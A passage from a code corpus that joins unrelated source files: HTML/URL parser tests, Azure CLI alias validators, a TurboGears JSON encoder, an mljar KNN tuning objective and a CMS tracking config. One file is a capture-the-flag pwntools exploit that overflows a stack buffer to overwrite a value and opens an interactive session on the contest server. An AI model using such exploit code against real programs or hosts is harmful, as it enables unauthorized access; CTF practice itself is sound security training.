('script', {'language': 'JavaScript'}), ('>!><!_!_!-->!_-', {}),
('/script', {})])
assert tagjoin(tagextract(s)) == f(
'\r<html><!-- Comment<a href="blah"> --><hiya><foo><test ' +
'content="6" tag="5"><is broken="False"><yay><style><><>><' +
'</style><foo bar="5">end<!-- <!-- nested --> ' +
'<script language="JavaScript"><>!><!_!_!-->!_-></script>')
s = doc5
assert tagextract(s) == f(
[('a', {'href':'foobar/ \t=', 'base':'10', 'x':'15'}),
('a', {'x':'9', 't':'20'})])
assert tagjoin(tagextract(s)) == f(
'<a base="10" href="foobar/ \t=" x="15"><a t="20" x="9">')
# -----------------------------------------------------------------
# Test _full_tag_extract()
# -----------------------------------------------------------------
for s in [doc1, doc2, doc3,
doc1.replace(f('"'), f("'")), doc2.replace(f('"'), f("'")),
doc3.replace(f('"'), f("'"))]:
L = _full_tag_extract(s)
for (i, item) in _enumerate(L):
if isinstance(item, _HTMLTag):
for key in list(item.attrs.keys()):
assert s[item.key_pos[key][0]:item.key_pos[key][1]].lower()\
== key
if item.attrs[key] != None:
assert s[item.value_pos[key][0]:item.value_pos[key][1]] \
== item.attrs[key]
n = 1000
doc4 = f('<tag name = "5" value ="6afdjherknc4 cdk j" a="7" b=8/>')
doc4 *= n
L = tagextract(doc4)
assert len(L) == n
for i in range(n):
assert L[i] == f([('tag/', {'name':'5', 'value':'6afdjherknc4 cdk j',
'a':'7', 'b':'8'})])[0]
# -----------------------------------------------------------------
# Test tagextract() and tagjoin() with XML directives.
# -----------------------------------------------------------------
doc1 = f(
'a<?xml version="1.0"?>' +
'b<!DOCTYPE html' +
'PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"' +
'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >c' +
'<html a=b><!-- Comment <><> hi! -->' +
'z<![CDATA[ some content ]]>rx' +
'<![C[DATA[ more and weirder ] ][]]>tt')
doc1join = f(
'a<?xml version="1.0"?>b<!DOCTYPE htmlPUBLIC "-//W3C//DTD ' +
'XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/' +
'xhtml1-transitional.dtd">c<html a="b"><!-- Comment <><> hi! ' +
'-->z<![CDATA[ some content ]]>rx<![C[DATA[ more and weirder ]' +
' ][]]>tt')
ans1 = f(
['a', ('?xml version="1.0"?', {}), 'b',
('!DOCTYPE html' +
'PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"' +
'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"', {}),
'c', ('html', {'a':'b'}), ('!-- Comment <><> hi! --', {}), 'z',
('![CDATA[ some content ]]', {}), 'rx',
('![C[DATA[ more and weirder ] ][]]', {}), 'tt'])
assert (tagextract(f('<?xml version="1.0" encoding="utf-8" ?>')) ==
f([('?xml version="1.0" encoding="utf-8" ?', {})]))
assert (tagextract(f('<!DOCTYPE html PUBLIC etc...>')) ==
f([('!DOCTYPE html PUBLIC etc...', {})]))
assert tagextract(doc1) == ans1
assert tagjoin(tagextract(doc1)) == doc1join
# -------------------------------------------------------------------
# Unit Tests: URL Parsing
# -------------------------------------------------------------------
def _test_urlextract(str_class=str):
"""
Unit tests for L{urlextract} and L{urljoin}.
Strings are cast to the string class argument str_class.
"""
# Work around lack of nested scopes in Python <= 2.1.
def f(obj, str_class2=str_class):
return _cast_to_str(obj, str_class2)
doc1 = f('urlblah, url ( blah2, url( blah3) url(blah4) ' +
'url("blah5") hum("blah6") url)"blah7"( url ( " blah8 " );;')
doc2 = f('<html><img src="a.gif" alt="b"><a href = b.html name=' +
'"c"><td background = ./c.png width=100%><a value=/f.jpg>' +
'<img src="http://www.abc.edu/d.tga">http://www.ignore.us/' +
'\nhttp://www.nowhere.com <style>url(h.gif) ' +
'url(http://www.testdomain.com/) http://ignore.com/a' +
'</style><img alt="c" src = "a.gif"><img src=/i.png>')
doc3 = f('@import foo;\n@import bar\n@import url(\'foo2\');' +
'@import url(\'http://bar2\')\n@import\turl("foo!");' +
'@import \'foo3\'\n@import "bar3";\n@importfails;' +
'@import;@import\n;url(\'howdy!\')\n@import foo5 ;' +
'@import \'foo6\' \n@import "foo7";')
doc4 = f('@import foo handheld;\n@import \'bar\' handheld\n' +
'@import url(\'foo2\') handheld; @import url(bar2) ha\n' +
'@import url("foo3") handheld\n')
doc5 = f('<html><img src="a.gif" alt="b" style="url(\'foo\')">' +
'<a href = b.html name="c" style="@import \'bar.css\'">')
doc6 = doc2.replace(f('"'), f("'")) # Test single quotes, too.
# Test CSS.
s = doc1
L = urlextract(s, mimetype='text/css')
L2 = [x.url for x in L]
assert L2 == f([' blah3', 'blah4', 'blah5', ' blah8 '])
assert [s[x.start:x.end] == x.url for x in L].count(False) == 0
# Test CSS more.
s = doc3
L = urlextract(s, mimetype='text/css')
L2 = [x.url for x in L]
assert L2 == f(['foo', 'bar', 'foo2', 'http://bar2', 'foo!',
'foo3', 'bar3', 'howdy!', 'foo5', 'foo6', 'foo7'])
assert [s[x.start:x.end] == x.url for x in L].count(False) == 0
# Test CSS even more.
s = doc4
L = urlextract(s, mimetype='text/css')
L2 = [x.url for x in L]
assert L2 == f(['foo', 'bar', 'foo2', 'bar2', 'foo3'])
assert [s[x.start:x.end] == x.url for x in L].count(False) == 0
# Test HTML.
s = doc2
L = urlextract(s)
L2 = [x.url for x in L]
L3 = [x.url for x in urlextract(doc6)]
ans = f(['a.gif', 'b.html', './c.png',
'http://www.abc.edu/d.tga', 'h.gif',
'http://www.testdomain.com/', 'a.gif', '/i.png'])
assert L2 == L3 == ans
for i in range(len(L)):
assert s[L[i].start:L[i].end] == L[i].url
# Test HTML more.
n = 100
s2 = s * n
L3 = urlextract(s2)
L4 = [x.url for x in L3]
assert L4 == L2 * n
for i in range(len(L3)):
assert s2[L3[i].start:L3[i].end] == L3[i].url
# Test HTML w/ siteurl.
base = f('http://www.python.org/~guido/')
L = urlextract(s, base)
L2 = [x.url for x in L]
assert L2 == [urllib.parse.urljoin(base, x) for x in ans]
# Test urljoin().
assert urljoin(doc1, urlextract(doc1, mimetype='text/css')) == doc1
assert urljoin(doc2, urlextract(doc2)) == doc2
s = doc2
L = urlextract(s)
L[3].url = f('FOO')
L[5].url = f('BAR')
L[7].url = f('F00!')
assert urljoin(s, L) == f(
'<html><img src="a.gif" alt="b"><a href = b.html name="c">' +
'<td background = ./c.png width=100%><a value=/f.jpg>' +
'<img src="FOO">http://www.ignore.us/\nhttp://www.nowhere.com ' +
'<style>url(h.gif) url(BAR) http://ignore.com/a</style>' +
'<img alt="c" src = "a.gif"><img src=F00!>')
# Test HTML yet more.
s = doc5
L = urlextract(s)
L2 = [x.url for x in L]
assert L2 == f(['foo', 'a.gif', 'bar.css', 'b.html'])
assert [s[x.start:x.end] == x.url for x in L].count(False) == 0
# -------------------------------------------------------------------
# Unit Test Main Routine
# -------------------------------------------------------------------
def _test():
"""
Unit test main routine.
"""
print('Unit tests:')
_test_remove_comments()
print(' _remove_comments: OK')
_test_shlex_split()
print(' _shlex_split: OK')
_test_tag_dict()
print(' _tag_dict: OK')
_test_tuple_replace()
print(' _tuple_replace: OK')
_test_tagextract()
print(' tagextract*: OK')
_test_tagextract(str)
print(' tagextract (unicode)*: OK')
_test_urlextract()
print(' urlextract*: OK')
_test_urlextract(str)
print(' urlextract (unicode)*: OK')
print()
print('* The corresponding join method has been tested as well.')
if __name__ == '__main__':
_test()
|
src/alias/azext_alias/_validators.py
|
Mannan2812/azure-cli-extensions
| 207 |
79151
|
<gh_stars>100-1000
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import re
import shlex
from knack.util import CLIError
import azext_alias
from azext_alias.argument import get_placeholders
from azext_alias.util import (
get_config_parser,
is_url,
reduce_alias_table,
filter_alias_create_namespace,
retrieve_file_from_url
)
from azext_alias._const import (
COLLISION_CHECK_LEVEL_DEPTH,
INVALID_ALIAS_COMMAND_ERROR,
EMPTY_ALIAS_ERROR,
INVALID_STARTING_CHAR_ERROR,
INCONSISTENT_ARG_ERROR,
COMMAND_LVL_ERROR,
CONFIG_PARSING_ERROR,
ALIAS_FILE_NOT_FOUND_ERROR,
ALIAS_FILE_DIR_ERROR,
FILE_ALREADY_EXISTS_ERROR,
ALIAS_FILE_NAME
)
from azext_alias.alias import AliasManager
def process_alias_create_namespace(namespace):
"""
Validate input arguments when the user invokes 'az alias create'.
Args:
namespace: argparse namespace object.
"""
namespace = filter_alias_create_namespace(namespace)
_validate_alias_name(namespace.alias_name)
_validate_alias_command(namespace.alias_command)
_validate_alias_command_level(namespace.alias_name, namespace.alias_command)
_validate_pos_args_syntax(namespace.alias_name, namespace.alias_command)
def process_alias_import_namespace(namespace):
"""
Validate input arguments when the user invokes 'az alias import'.
Args:
namespace: argparse namespace object.
"""
if is_url(namespace.alias_source):
alias_source = retrieve_file_from_url(namespace.alias_source)
_validate_alias_file_content(alias_source, url=namespace.alias_source)
else:
namespace.alias_source = os.path.abspath(namespace.alias_source)
_validate_alias_file_path(namespace.alias_source)
_validate_alias_file_content(namespace.alias_source)
def process_alias_export_namespace(namespace):
"""
Validate input arguments when the user invokes 'az alias export'.
Args:
namespace: argparse namespace object.
"""
namespace.export_path = os.path.abspath(namespace.export_path)
if os.path.isfile(namespace.export_path):
raise CLIError(FILE_ALREADY_EXISTS_ERROR.format(namespace.export_path))
export_path_dir = os.path.dirname(namespace.export_path)
if not os.path.isdir(export_path_dir):
os.makedirs(export_path_dir)
if os.path.isdir(namespace.export_path):
namespace.export_path = os.path.join(namespace.export_path, ALIAS_FILE_NAME)
def _validate_alias_name(alias_name):
"""
Check if the alias name is valid.
Args:
alias_name: The name of the alias to validate.
"""
if not alias_name:
raise CLIError(EMPTY_ALIAS_ERROR)
if not re.match('^[a-zA-Z]', alias_name):
raise CLIError(INVALID_STARTING_CHAR_ERROR.format(alias_name[0]))
def _validate_alias_command(alias_command):
"""
Check if the alias command is valid.
Args:
alias_command: The command to validate.
"""
if not alias_command:
raise CLIError(EMPTY_ALIAS_ERROR)
split_command = shlex.split(alias_command)
boundary_index = len(split_command)
for i, subcommand in enumerate(split_command):
if not re.match('^[a-z]', subcommand.lower()) or i > COLLISION_CHECK_LEVEL_DEPTH:
boundary_index = i
break
# Extract possible CLI commands and validate
command_to_validate = ' '.join(split_command[:boundary_index]).lower()
for command in azext_alias.cached_reserved_commands:
if re.match(r'([a-z\-]*\s)*{}($|\s)'.format(command_to_validate), command):
return
_validate_positional_arguments(shlex.split(alias_command))
def _validate_pos_args_syntax(alias_name, alias_command):
"""
Check if the positional argument syntax is valid in alias name and alias command.
Args:
alias_name: The name of the alias to validate.
alias_command: The command to validate.
"""
pos_args_from_alias = get_placeholders(alias_name)
# Split by '|' to extract positional argument name from Jinja filter (e.g. {{ arg_name | upper }})
# Split by '.' to extract positional argument name from function call (e.g. {{ arg_name.split()[0] }})
pos_args_from_command = [x.split('|')[0].split('.')[0].strip() for x in get_placeholders(alias_command)]
if set(pos_args_from_alias) != set(pos_args_from_command):
arg_diff = set(pos_args_from_alias) ^ set(pos_args_from_command)
raise CLIError(INCONSISTENT_ARG_ERROR.format('' if len(arg_diff) == 1 else 's',
arg_diff,
'is' if len(arg_diff) == 1 else 'are'))
def _validate_alias_command_level(alias, command):
"""
Make sure that if the alias is a reserved command, the command that the alias points to
in the command tree does not conflict in levels.
e.g. 'dns' -> 'network dns' is valid because dns is a level 2 command and network dns starts at level 1.
However, 'list' -> 'show' is not valid because list and show are both reserved commands at level 2.
Args:
alias: The name of the alias.
command: The command that the alias points to.
"""
alias_collision_table = AliasManager.build_collision_table([alias])
# Alias is not a reserved command, so it can point to any command
if not alias_collision_table:
return
command_collision_table = AliasManager.build_collision_table([command])
alias_collision_levels = alias_collision_table.get(alias.split()[0], [])
command_collision_levels = command_collision_table.get(command.split()[0], [])
# Check if there is a command level conflict
if set(alias_collision_levels) & set(command_collision_levels):
raise CLIError(COMMAND_LVL_ERROR.format(alias, command))
def _validate_alias_file_path(alias_file_path):
"""
Make sure the alias file path is neither non-existant nor a directory
Args:
The alias file path to import aliases from.
"""
if not os.path.exists(alias_file_path):
raise CLIError(ALIAS_FILE_NOT_FOUND_ERROR)
if os.path.isdir(alias_file_path):
raise CLIError(ALIAS_FILE_DIR_ERROR.format(alias_file_path))
def _validate_alias_file_content(alias_file_path, url=''):
"""
Make sure the alias name and alias command in the alias file is in valid format.
Args:
The alias file path to import aliases from.
"""
alias_table = get_config_parser()
try:
alias_table.read(alias_file_path)
for alias_name, alias_command in reduce_alias_table(alias_table):
_validate_alias_name(alias_name)
_validate_alias_command(alias_command)
_validate_alias_command_level(alias_name, alias_command)
_validate_pos_args_syntax(alias_name, alias_command)
except Exception as exception: # pylint: disable=broad-except
error_msg = CONFIG_PARSING_ERROR % AliasManager.process_exception_message(exception)
error_msg = error_msg.replace(alias_file_path, url or alias_file_path)
raise CLIError(error_msg)
def _validate_positional_arguments(args):
"""
To validate the positional argument feature - https://github.com/Azure/azure-cli/pull/6055.
Assuming that unknown commands are positional arguments immediately
led by words that only appear at the end of the commands
Slight modification of
https://github.com/Azure/azure-cli/blob/dev/src/azure-cli-core/azure/cli/core/commands/__init__.py#L356-L373
Args:
args: The arguments that the user inputs in the terminal.
Returns:
Rudimentary parsed arguments.
"""
nouns = []
for arg in args:
if not arg.startswith('-') or not arg.startswith('{{'):
nouns.append(arg)
else:
break
while nouns:
search = ' '.join(nouns)
# Since the command name may be immediately followed by a positional arg, strip those off
if not next((x for x in azext_alias.cached_reserved_commands if x.endswith(search)), False):
del nouns[-1]
else:
return
raise CLIError(INVALID_ALIAS_COMMAND_ERROR.format(' '.join(args)))
|
sunshinectf2020/speedrun/exploit_00.py
|
nhtri2003gmail/ctf-write-ups
| 101 |
79209
|
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./chall_00')
if not args.REMOTE:
p = process(binary.path)
else:
p = remote('chal.2020.sunshinectf.org', 30000)
payload = b''
payload += (0x48 - 0xc) * b'A'
payload += p32(0xfacade)
p.sendlineafter('This is the only one\n',payload)
p.interactive()
|
tg/jsonify.py
|
sergiobrr/tg2
| 812 |
79244
|
"""JSON encoding functions."""
import datetime
import decimal
import types
from json import JSONEncoder as _JSONEncoder
from tg.support.converters import asbool
from webob.multidict import MultiDict
from tg._compat import string_type
from tg.configuration.utils import GlobalConfigurable
from tg.util.sqlalchemy import dictify as dictify_sqla, is_saobject, is_query_result, is_query_row
from tg.util.ming import dictify as dictify_ming, is_mingobject, is_objectid
import logging
log = logging.getLogger(__name__)
class JsonEncodeError(Exception):
"""JSON Encode error"""
class JSONEncoder(_JSONEncoder, GlobalConfigurable):
"""TurboGears custom JSONEncoder.
Provides support for encoding objects commonly used in TurboGears apps, like:
- SQLAlchemy queries
- Ming queries
- Dates
- Decimals
- Generators
Support for additional types is provided through the ``__json__`` method
that will be called on the object by the JSONEncoder when provided and through
the ability to register custom encoder for specific types using
:meth:`.JSONEncoder.register_custom_encoder`.
"""
CONFIG_NAMESPACE = 'json.'
CONFIG_OPTIONS = {'isodates': asbool,
'allow_lists': asbool}
def __init__(self, **kwargs):
self._registered_types_map = {}
self._registered_types_list = tuple()
kwargs = self.configure(**kwargs)
super(JSONEncoder, self).__init__(**kwargs)
def configure(self, isodates=False, custom_encoders=None, allow_lists=False, **kwargs):
"""JSON encoder can be configured through :class:`.ApplicationConfigurator`
(``app_cfg.base_config``) using the following options:
- ``json.isodates`` -> encode dates using ISO8601 format
- ``json.custom_encoders`` -> List of tuples ``(type, encode_func)`` to register
custom encoders for specific types.
- ``json.allow_lists`` -> Allows lists to be encoded, this is usually disabled for
security reasons due to JSON hijacking. See http://stackoverflow.com/questions/16289894
for additional details.
"""
self._isodates = isodates
self._allow_lists = allow_lists
if custom_encoders is not None:
for type_, encoder in custom_encoders.items():
self.register_custom_encoder(type_, encoder)
return kwargs
def register_custom_encoder(self, objtype, encoder):
"""Register a custom encoder for the given type.
Instead of using standard behavior for encoding the given type to JSON, the
``encoder`` will used instead. ``encoder`` must be a callable that takes
the object as argument and returns an object that can be encoded in JSON (usually a dict).
"""
if objtype in self._registered_types_map:
log.warning('%s type already registered for a custom encoder, replacing it', objtype)
self._registered_types_map[objtype] = encoder
# Append to head, so we find first the last registered types
self._registered_types_list = (objtype, ) + self._registered_types_list
def default(self, obj):
if isinstance(obj, self._registered_types_list):
# Minor optimization, enter loop only when we are instance of a supported type.
for type_, encoder in self._registered_types_map.items():
if isinstance(obj, type_):
return encoder(obj)
elif hasattr(obj, '__json__') and callable(obj.__json__):
return obj.__json__()
elif isinstance(obj, (datetime.date, datetime.datetime, datetime.time)):
if self._isodates:
if isinstance(obj, (datetime.datetime, datetime.time)):
obj = obj.replace(microsecond=0)
return obj.isoformat()
else:
return str(obj)
elif isinstance(obj, decimal.Decimal):
return float(obj)
elif is_saobject(obj):
return dictify_sqla(obj)
elif is_mingobject(obj):
return dictify_ming(obj)
elif is_query_result(obj):
return dict(rows=list(obj), count=obj.rowcount)
elif is_query_row(obj):
return dict(rows=dict(obj), count=1)
elif is_objectid(obj):
return str(obj)
elif isinstance(obj, MultiDict):
return obj.mixed()
elif isinstance(obj, types.GeneratorType):
return list(obj)
else:
return _JSONEncoder.default(self, obj)
_default_encoder = JSONEncoder.create_global()
def encode(obj, encoder=None, iterencode=False):
"""Return a JSON string representation of a Python object."""
if encoder is None:
encoder = _default_encoder
encode_func = encoder.encode
if iterencode:
encode_func = encoder.iterencode
if isinstance(obj, string_type):
return encode_func(obj)
if encoder._allow_lists is False:
try:
value = obj['test']
except TypeError:
if not hasattr(obj, '__json__') and not is_saobject(obj) and not is_mingobject(obj):
raise JsonEncodeError('Your Encoded object must be dict-like.')
except:
pass
return encode_func(obj)
def encode_iter(obj, encoder=None):
"""Encode object, yielding each string representation as available."""
return encode(obj, encoder=encoder, iterencode=True)
|
supervised/tuner/optuna/knn.py
|
stjordanis/mljar-supervised
| 1,882 |
79298
|
import numpy as np
from supervised.algorithms.knn import KNeighborsAlgorithm, KNeighborsRegressorAlgorithm
import optuna
from supervised.utils.metric import Metric
from supervised.algorithms.registry import BINARY_CLASSIFICATION
from supervised.algorithms.registry import MULTICLASS_CLASSIFICATION
from supervised.algorithms.registry import REGRESSION
class KNNObjective:
def __init__(
self,
ml_task,
X_train,
y_train,
sample_weight,
X_validation,
y_validation,
sample_weight_validation,
eval_metric,
n_jobs,
random_state,
):
self.ml_task = ml_task
self.X_train = X_train
self.y_train = y_train
self.sample_weight = sample_weight
self.X_validation = X_validation
self.y_validation = y_validation
self.eval_metric = eval_metric
self.n_jobs = n_jobs
self.seed = random_state
def __call__(self, trial):
try:
params = {
"n_neighbors": trial.suggest_int("n_neighbors", 1, 128),
"weights": trial.suggest_categorical(
"weights", ["uniform", "distance"]
),
"n_jobs": self.n_jobs,
"rows_limit": 100000,
"ml_task": self.ml_task,
}
Algorithm = (
KNeighborsRegressorAlgorithm
if self.ml_task == REGRESSION
else KNeighborsAlgorithm
)
model = Algorithm(params)
model.fit(self.X_train, self.y_train, sample_weight=self.sample_weight)
preds = model.predict(self.X_validation)
score = self.eval_metric(self.y_validation, preds)
if Metric.optimize_negative(self.eval_metric.name):
score *= -1.0
except optuna.exceptions.TrialPruned as e:
raise e
except Exception as e:
print("Exception in KNNObjective", str(e))
return None
return score
|
L1Trigger/TrackFindingTMTT/python/TMTrackProducer_Defaults_cfi.py
|
ckamtsikis/cmssw
| 852 |
79308
|
<filename>L1Trigger/TrackFindingTMTT/python/TMTrackProducer_Defaults_cfi.py<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
#---------------------------------------------------------------------------------------------------------
# This describes the full TMTT track reconstruction chain with 3 GeV threshold, where:
# the GP divides the tracker into 18 eta sectors (each sub-divided into 2 virtual eta subsectors);
# the HT uses a 32x18 array followed by 2x2 mini-HT array, with transverese HT readout & multiplexing,
# followed by the KF (or optionally SF+SLR) track fit; duplicate track removal (Algo50) is run.
#---------------------------------------------------------------------------------------------------------
TMTrackProducer_params = cms.PSet(
# Tags for ES products
magneticFieldInputTag = cms.ESInputTag( "VolumeBasedMagneticFieldESProducer", "" ),
trackerGeometryInputTag = cms.ESInputTag( "trackerGeometry", "" ),
trackerTopologyInputTag = cms.ESInputTag( "trackerTopology", "" ),
ttStubAlgoInputTag = cms.ESInputTag( "TTStubAlgorithm_official_Phase2TrackerDigi_", "" ),
# Tags for ED products
tpInputTag = cms.InputTag("mix", "MergedTrackTruth"),
stubInputTag = cms.InputTag("TTStubsFromPhase2TrackerDigis", "StubAccepted"),
stubTruthInputTag = cms.InputTag("TTStubAssociatorFromPixelDigis", "StubAccepted"),
clusterTruthInputTag = cms.InputTag("TTClusterAssociatorFromPixelDigis", "ClusterAccepted"),
genJetInputTag = cms.InputTag("ak4GenJets", ""),
# Enable output of TTTracks from part-way through tracking chain (after HT & RZ).
EnableOutputIntermediateTTTracks = cms.bool(False),
# Enable all use of MC truth info (disable to save CPU)
EnableMCtruth = cms.bool(False),
# Enable output histograms & job tracking performance summary (disable to save CPU)
EnableHistos = cms.bool(False),
#=== Cuts on MC truth particles (i.e., tracking particles) used for tracking efficiency measurements.
GenCuts = cms.PSet(
GenMinPt = cms.double(3.0),
GenMaxAbsEta = cms.double(2.4),
GenMaxVertR = cms.double(1.0), # Max distance of particle production vertex from centre of CMS.
GenMaxVertZ = cms.double(30.0),
GenMaxD0 = cms.double(5.0), # Max transverse impact parameter.
GenMaxZ0 = cms.double(999.0), # Max transverse impact parameter.
GenPdgIds = cms.vuint32(), # Only particles with these PDG codes used for efficiency measurement.
# Cut on MC truth tracks used for algorithmic tracking efficiency measurements.
GenMinStubLayers = cms.uint32(4)
),
#=== Cuts applied to stubs before arriving in L1 track finding board.
StubCuts = cms.PSet(
# Reduce number of bits used by front-end chips to store stub bend info?
# = 0 (no); = 1 (yes using official recipe); = 2 (yes using TMTT method)
DegradeBendRes = cms.uint32(2),
# Don't use stubs with eta beyond this cut, since the tracker geometry makes it impossible to reconstruct tracks with them.
MaxStubEta = cms.double(2.4),
# Don't use stubs whose measured Pt from bend info is significantly below HTArraySpec.HoughMinPt, where "significantly" means allowing for resolution in q/Pt derived from stub bend resolution specified below.
KillLowPtStubs = cms.bool(True),
# Print FE stub window sizes recommended by this code (in python cfg format used by CMSSW).
PrintStubWindows = cms.bool(False),
# Bend resolution assumed by bend filter in units of strip pitch. Also used when assigning stubs to sectors if EtaPhiSectors.CalcPhiTrkRes=True. And by the bend filter if HTFillingRphi.UseBendFilter=True.
# Suggested value: 1.19 if DegradeBendRes = 0, or 1.249 if it > 0.
# N.B. Avoid 1/4-integer values due to rounding error issues.
BendCut = cms.double(1.249),
# Additional contribution to bend resolution from its encoding into a reduced number of bits.
# This number is the assumed resolution relative to the naive guess of its value.
# It is ignored in DegradeBendRes = 0.
BendCutExtra = cms.double(0.0),
# Order stubs by bend in DTC, such that highest Pt stubs are transmitted first.
OrderStubsByBend = cms.bool(True)
),
#=== Optional Stub digitization.
StubDigitize = cms.PSet(
EnableDigitize = cms.bool(True), # Digitize stub coords? If not, use floating point coords.
#
#--- Parameters available in MP board. (And in case of Hybrid used internally in KF)
#
PhiSectorBits = cms.uint32(6), # Bits used to store phi sector number -- NOT USED
PhiSBits = cms.uint32(14), # Bits used to store phiS coord. (13 enough?)
PhiSRange = cms.double(0.698131700), # Range phiS coord. covers in radians.
RtBits = cms.uint32(12), # Bits used to store Rt coord.
RtRange = cms.double(91.652837), # Range Rt coord. covers in units of cm.
ZBits = cms.uint32(14), # Bits used to store z coord.
ZRange = cms.double(733.2227), # Range z coord. covers in units of cm.
#
#--- Parameters available in GP board (excluding any in common with MP specified above).
#
PhiNBits = cms.uint32(15), # Bits used to store PhiO parameter.
PhiNRange = cms.double(1.3962634), # Range PhiO parameter covers.
BendBits = cms.uint32(6) # Bits used to store stub bend.
),
#=== Configuration of tracker module type. Only provides test data for firmware.
TrackerModuleType = cms.PSet(
# Modules matching these criteria are type 0, 1, 2, 3 ...
PitchVsType = cms.vdouble(0.0099, 0.0099, 0.0099, 0.0099, 0.0089, 0.0099, 0.0089, 0.0089),
SpaceVsType = cms.vdouble(0.26 , 0.26 , 0.16 , 0.4 , 0.18 , 0.4 , 0.18 , 0.4 ),
# (Type vbool not implemented, so use vuint32 instead ...)
BarrelVsType = cms.vuint32( 1 , 1 , 1 , 1 , 1 , 0 , 0 , 0 ),
PSVsType = cms.vuint32( 1 , 1 , 1 , 1 , 0 , 1 , 0 , 0 ),
TiltedVsType = cms.vuint32( 0 , 1 , 0 , 1 , 0 , 0 , 0 , 0 )
),
#=== Configuration of Geometric Processor.
GeometricProc = cms.PSet(
# Use an FPGA-friendly approximation to determine track angle dphi from bend in GP?
UseApproxB = cms.bool(True), # Use approximation for B
# Params of approximation if used.
BApprox_gradient = cms.double(0.886454), # Gradient term of linear equation for approximating B
BApprox_intercept = cms.double(0.504148) # Intercept term of linear equation for approximating B
),
#=== Division of Tracker into phi sectors.
PhiSectors = cms.PSet(
NumPhiNonants = cms.uint32(9), # Divisions of Tracker at DTC
NumPhiSectors = cms.uint32(18), # Divisions of Tracker at GP.
ChosenRofPhi = cms.double(67.240), # Use phi of track at this radius for assignment of stubs to phi sectors & also for one of the axes of the r-phi HT. If ChosenRofPhi=0, then use track phi0. - Should be an integer multiple of the stub r digitisation granularity.
#--- You can set one or both the following parameters to True.
UseStubPhi = cms.bool(True), # Require stub phi to be consistent with track of Pt > HTArraySpec.HoughMinPt that crosses HT phi axis?
UseStubPhiTrk = cms.bool(True), # Require stub phi0 (or phi65 etc.) as estimated from stub bend, to lie within HT phi axis, allowing tolerance(s) specified below?
AssumedPhiTrkRes = cms.double(0.5), # Tolerance in stub phi0 (or phi65) assumed to be this fraction of phi sector width. (N.B. If > 0.5, then stubs can be shared by more than 2 phi sectors).
CalcPhiTrkRes = cms.bool(True) # If true, tolerance in stub phi0 (or phi65 etc.) will be reduced below AssumedPhiTrkRes if stub bend resolution specified in StubCuts.BendCut suggests it is safe to do so.
),
#=== Division of Tracker into eta sectors
EtaSectors = cms.PSet(
# Eta boundaries for 18 eta regions
# EtaRegions = cms.vdouble(-2.4,-2.16,-1.95,-1.7,-1.43,-1.16,-0.89,-0.61,-0.31,0.0,0.31,0.61,0.89,1.16,1.43,1.7,1.95,2.16,2.4),
# Eta boundaries for 16 eta regions
EtaRegions = cms.vdouble(-2.4,-2.08,-1.68,-1.26,-0.90,-0.62,-0.41,-0.20,0.0,0.20,0.41,0.62,0.90,1.26,1.68,2.08,2.4),
ChosenRofZ = cms.double(50.), # Use z of track at this radius for assignment of tracks to eta sectors & also for one of the axes of the r-z HT. Do not set to zero!
BeamWindowZ = cms.double(15), # Half-width of window assumed to contain beam-spot in z.
AllowOver2EtaSecs = cms.bool(True) # If True, the code will not throw an error if a stub is assigned to 3 or more eta sectors.
),
#=== r-phi Hough transform array specifications.
HTArraySpecRphi = cms.PSet(
HoughMinPt = cms.double(3.0), # Min track Pt that Hough Transform must find. Also used by StubCuts.KillLowPtStubs and by EtaPhiSectors.UseStubPhi.
# If MiniHTstage = True, these refers to mini cells in whole HT array.
HoughNbinsPt = cms.uint32(32), # HT array dimension in track q/Pt. (If MiniHTstage = True, this refers to mini cells in whole HT array).
HoughNbinsPhi = cms.uint32(64), # HT array dimension in track phi0 (or phi65 or any other track phi angle. (If MiniHTstage = True, this refers to mini cells in whole HT array).
EnableMerge2x2 = cms.bool(False), # Groups of neighbouring 2x2 cells in HT will be treated as if they are a single large cell? N.B. You can only enable this option if your HT array has even numbers of bins in both dimensions. And this cfg param ignored if MiniHTstage = True. HISTORIC OPTION. SUGGEST NOT USING!
MaxPtToMerge2x2 = cms.double(3.5), # but only cells with pt < MaxPtToMerge2x2 will be merged in this way (irrelevant if EnableMerge2x2 = false).
NumSubSecsEta = cms.uint32(2), # Subdivide each sector into this number of subsectors in eta within r-phi HT.
Shape = cms.uint32(0), # cell shape: 0 for square, 1 for diamond, 2 hexagon (with vertical sides), 3 square with alternate rows shifted by 0.5*cell_width.
MiniHTstage = cms.bool(True), # Run 2nd stage HT with mini cells inside each 1st stage normal HT cell..
MiniHoughNbinsPt = cms.uint32(2), # Number of mini cells along q/Pt axis inside each normal HT cell.
MiniHoughNbinsPhi = cms.uint32(2), # Number of mini cells along phi axis inside each normal HT cell.
MiniHoughMinPt = cms.double(3.0), # Below this Pt threshold, the mini HT will not be used, to reduce sensitivity to scattering, with instead tracks found by 1st stage coarse HT sent to output. (HT cell numbering remains as if mini HT were in use everywhere).
MiniHoughDontKill = cms.bool(False), # If true, allows tracks found by 1st stage coarse HT to be output if 2nd stage mini HT finds no tracks.
MiniHoughDontKillMinPt = cms.double(8.0), # If MiniHoughDontKill=True, this option restricts it to keep 1st stage HT tracks only if their Pt is exceeds this cut. (Used to improve electron tracking above this threshold).
MiniHoughLoadBalance = cms.uint32(2) # Load balancing disabled = 0; static load balancing of output links = 1; dynamic load balancing of output links = 2.
),
#=== Rules governing how stubs are filled into the r-phi Hough Transform array.
HTFillingRphi = cms.PSet(
# Take all cells in r-phi HT array crossed by line corresponding to each stub (= 0) or take only some to reduce rate at cost
# of efficiency ( > 0). If this option is > 0, it can be 1 or 2, corresponding to different algorithms for rejecting
# some of the cells. "1" is an algorithm invented by Ian, whereas "2" corresponds to Thomas' 1st firmware implementation which only handled 1 cell per HT column.
# Suggest setting KillSomeHTCellsRphi=1 (=0) if HTArraySpec.ChosenRofPhi=0 (>0)
KillSomeHTCellsRphi = cms.uint32(0),
# Use filter in each r-phi HT cell, filling it only with stubs that have consistent bend information?
